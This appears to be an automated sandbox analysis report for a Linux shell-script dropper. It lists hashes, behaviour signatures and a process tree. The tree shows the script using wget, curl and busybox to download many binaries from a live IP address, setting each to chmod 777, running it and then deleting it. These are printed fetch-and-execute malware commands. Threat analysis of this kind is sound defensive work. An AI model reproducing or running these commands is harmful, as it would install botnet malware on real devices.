Analysis
-
max time kernel
72s -
max time network
74s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 955 chmod 742 chmod 901 chmod 907 chmod 889 chmod 913 chmod 757 chmod 931 chmod 895 chmod 985 chmod 771 chmod 811 chmod 925 chmod 874 chmod 880 chmod 919 chmod 751 chmod 820 chmod 868 chmod 949 chmod 979 chmod 854 chmod 961 chmod 973 chmod 967 chmod 834 chmod 937 chmod 943 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 744 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 752 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 758 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 772 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 812 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 821 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 836 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 855 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 869 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 875 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 881 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 890 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 896 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 902 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 908 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 914 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 920 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 926 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 932 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 938 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 944 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 950 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 956 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 962 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 968 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 974 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 980 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 986 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 916 wget 918 busybox 892 wget 893 curl 894 busybox 897 rm 896 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 917 curl 920 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 921 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:714
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:719
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:739
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:746
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:750
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:756
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:758
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:760
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:767
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:808
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:819
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:831
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:844
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:850
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:859
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:867
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:873
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:879
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:888
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:894
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:896
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:900
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:906
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:912
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:918
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:920
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:924
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:930
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:936
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
